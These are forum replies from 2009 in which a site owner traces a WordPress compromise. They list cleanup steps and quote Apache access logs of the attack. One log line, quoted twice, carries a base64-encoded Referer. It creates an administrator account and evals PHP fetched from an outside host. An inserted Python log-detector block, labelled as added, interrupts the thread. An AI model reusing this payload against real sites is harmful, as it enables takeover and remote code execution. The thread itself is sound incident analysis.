Forum Replies Created

Viewing 6 replies - 16 through 21 (of 21 total)
  • @kirkpete

    Probably not required but you need to be sure of dealing with every single compromised file in your system.

    Sometimes depending on where you are at and your current operations it is easier to do that.

    I happen to keep a pristine version of everything I run (entire config, plugins, etc.) around so I can just deploy it in an instant.

    RB

    @marc

    You are technically correct but the big damage comes in the xmlrpc.php post. At least from my standpoint of system integrity. In any case disable the options-permalink as well for a lockout. I am keeping one or two of my lower volume sites open just to see if I can track this fool down.

    RB

    @marc = agree it looks to be in the newest code.

    A couple of other preliminary notes:

    My reaction to this has been –

    1) Immediately creating a new NameVirtualServer and installing a pristine php code base for WP and all of my plug-ins

    2) deleting all users registered in September from my database

    3) temporarily disabling xmlrpc.php until I have a full understanding of the entire attack sequence.

    4) changing all of my passwords (do not forget that the database user/pass is plain text in the config.php)

    5) firewalled a few blocks of IP addresses that seemed to correlate to ssh password attacks and this exploit from a timing perspective.

    This only took about 5 minutes for a bunch of sites/clients but better safe than sorry. The biggest deal for my sites was that regeneration of the caches on some of my higher volume sites caused some degree of outage.

    I also have reason to believe the attack may register a user prior to the actual exploit but I don’t know why yet and it may just be a red herring.

    RB

    Just my 2¢ –

    The xmlrpc.php POST that I put up a few hours ago is the hack. I looked through the entire sequence in my access logs – the modified/new files come after the hack. Here is the entire opening sequence for the hack in question. I had to move all of my data to a pristine code base in a new NameVirtualServer and am still tweaking some of my caching and things to get everything back to normal, so I have not had time to dig through my IP dumps at the time of the exploit to see what else may have been in the attack payload, but I will get around to it.

    Here is the entire opening sequence from my access logs:

    48195 122.135.85.220 - - [04/Sep/2009:04:53:21 -0400] "GET /wp-login.php HTTP/1.1" 200 1948 "https://photo.rwboyer.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3"

    48196 122.135.85.220 - - [04/Sep/2009:04:53:24 -0400] "POST /wp-login.php HTTP/1.1" 302 - "https://photo.rwboyer.com/wp-login.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3"

    48197 122.135.85.220 - - [04/Sep/2009:04:53:28 -0400] "GET /wp-admin/ HTTP/1.1" 200 34669 "https://photo.rwboyer.com/wp-login.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3"

    48198 122.135.85.220 - - [04/Sep/2009:04:53:34 -0400] "GET /wp-admin//options-permalink.php HTTP/1.1" 200 15153 "https://photo.rwboyer.com/wp-admin//options-permalink.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3"

    48199 122.135.85.220 - - [04/Sep/2009:04:53:37 -0400] "POST /wp-admin//options-permalink.php HTTP/1.1" 200 15312 "https://photo.rwboyer.com/wp-admin//options-permalink.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3"

    48200 122.135.85.220 - - [04/Sep/2009:04:53:41 -0400] "POST /xmlrpc.php HTTP/1.1" 200 173 "JHJvbGU9J2FkbWluaXN0cmF0b3InOyR1c2VyX2xvZ2luPSdKZXJhbXlEZWNrNzknOyR1c2VyX3Bhc3M9J09nck8hSTMkTGQhISc7ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2xpbmtzLndlYndvcmRwcmVzcy5jbi9kYXRhL3Nob3J0cGFydDIudHh0JykpO2V4aXQ7" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3"

    RB
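    A defender-side check for the sequence shown in this post (a POST to options-permalink.php followed within minutes by a POST to xmlrpc.php from the same IP whose Referer is a base64 blob instead of a URL), as an added example that is not part of the original post. It parses Apache combined-log lines in the form quoted above, leading line number included, and runs over a constructed sample; the regex, the five-minute window, the base64 heuristic, the 198.51.100.7 address and the placeholder Referer are my assumptions.

```python
import base64
import re
from datetime import datetime, timedelta
# Apache combined log, optionally prefixed by a line number as in the excerpt above.
LOG_RE = re.compile(
    r'^(?:\d+\s+)?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
B64_RE = re.compile(r'^[A-Za-z0-9+/]{40,}={0,2}$')  # long base64 blob, not a URL

def parse(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["path"].replace("//", "/")  # /wp-admin//x.php -> /wp-admin/x.php
    return rec

def looks_base64(value):
    """True if a Referer header is a decodable base64 blob rather than a URL."""
    try:
        return bool(B64_RE.match(value)) and bool(base64.b64decode(value, validate=True))
    except ValueError:  # binascii.Error is a ValueError
        return False

def find_sequences(lines, window=timedelta(minutes=5)):
    """(ip, permalink_ts, xmlrpc_ts) for each IP that POSTs to options-permalink.php, then xmlrpc.php with a base64 Referer."""
    hits, last_permalink = [], {}
    for rec in filter(None, map(parse, lines)):
        if rec["method"] != "POST":
            continue
        if rec["path"] == "/wp-admin/options-permalink.php":
            last_permalink[rec["ip"]] = rec["ts"]
        elif rec["path"] == "/xmlrpc.php" and looks_base64(rec["referer"]):
            t0 = last_permalink.get(rec["ip"])
            if t0 is not None and rec["ts"] - t0 <= window:
                hits.append((rec["ip"], t0, rec["ts"]))
    return hits

# Constructed sample mirroring the sequence above; the Referer blob is a harmless placeholder, not the original payload.
_B64 = base64.b64encode(b"constructed sample referer, not the original payload").decode()
SAMPLE_LOG = [
    '48199 122.135.85.220 - - [04/Sep/2009:04:53:37 -0400] "POST /wp-admin//options-permalink.php HTTP/1.1" 200 15312 "https://photo.rwboyer.com/wp-admin//options-permalink.php" "Mozilla/5.0"',
    f'48200 122.135.85.220 - - [04/Sep/2009:04:53:41 -0400] "POST /xmlrpc.php HTTP/1.1" 200 173 "{_B64}" "Mozilla/5.0"',
    '48201 198.51.100.7 - - [04/Sep/2009:05:10:02 -0400] "POST /xmlrpc.php HTTP/1.1" 200 173 "https://photo.rwboyer.com/" "WordPress/2.8"',
]
```

    The third sample line is an ordinary XML-RPC client with a URL Referer and no preceding permalink POST, so it is not reported.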

    I think I have found the hack and the source. According to my access logs this appears to be the hack:

    48200 122.135.85.220 - - [04/Sep/2009:04:53:41 -0400] "POST /xmlrpc.php HTTP/1.1" 200 173 "JHJvbGU9J2FkbWluaXN0cmF0b3InOyR1c2VyX2xvZ2luPSdKZXJhbXlEZWNrNzknOyR1c2VyX3Bhc3M9J09nck8hSTMkTGQhISc7ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2xpbmtzLndlYndvcmRwcmVzcy5jbi9kYXRhL3Nob3J0cGFydDIudHh0JykpO2V4aXQ7" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3"

    and the source, as you can see, appears to be IP 122.135.85.220.

    Anyone else out there that can confirm? I just looked as I found the problem and moved all of my data to a non-hacked server earlier on a new virtual server. So now I am looking at the cause.

    RB
